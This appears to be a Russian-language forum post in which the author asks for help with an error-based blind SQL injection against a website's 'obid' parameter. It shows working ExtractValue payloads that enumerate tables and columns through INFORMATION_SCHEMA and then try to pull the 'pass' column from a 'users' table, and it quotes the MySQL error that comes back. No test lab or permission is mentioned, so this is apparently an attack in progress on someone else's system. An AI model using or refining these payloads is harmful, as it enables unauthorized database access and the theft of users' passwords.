Blind SQL Injection
Добрый день уважаемые форумчане.
Помогите разобраться в чем проблема, замучился уже.
Суть проблемы:
Дергаю названия таблиц так:
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+table_name+from+INFORMATION_SCHEMA.tables+LIMIT+0,1)))--
Такой вид потому что прямого вывода на страницу нету, да и ошибки отображаются только в исходном коде страницы.
Пошел дальше, получил списки всех таблиц.
одна из них users
Получаю название колонок:
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+column_name+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+0,1)))--
Получил все нормально.
Теперь надо выдернуть значения.
Делаю так:
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+pass+from+users+LIMIT+0,1)))--
В ответ получаю:
Код:
Code:
mysql error: Unknown column 'pass' in 'field list'
Вопрос, почему говорит что нет такой колонки когда при переборе колонок в таблице users показало что есть pass?
ЗЫ в это таблице есть еще несколько колонок, одна из них name, ее видит нормально, а все остальные не видит.